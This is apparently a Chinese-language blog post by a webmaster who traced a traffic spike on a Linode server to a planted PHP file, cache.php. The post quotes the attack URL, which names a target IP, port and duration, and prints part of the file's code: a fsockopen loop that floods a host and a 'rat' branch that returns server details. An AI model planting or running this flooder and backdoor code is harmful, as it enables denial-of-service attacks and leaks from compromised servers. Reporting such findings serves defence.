晚上手机收到linode发来的短信.说流量超出了我设置限定的范围了.我一看牛逼!每秒50M左右流量发包
通过查找发现了用来攻击的访问连接:
http://这里是网站地址/cache.php?host=98.126.201.212&port=80&time=163
cache代码为:
0){ echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat']; exit; } exit; } $max_time = time()+$exec_time; while(1){ $packets++; if(time() > $max_time or $exec_time != 163){ break; } $fp = fsockopen("tcp://$host", $port, $errno, $errstr, 0); } ?>
网上搜到一个小工具对大家应该有用也发出来
百度关键词:“自己写的一个批量查找文件内容的php程序”
最后推荐两个小博客
http://hi.baidu.com/wcj343169893/home
http://hi.baidu.com/opensourebyxu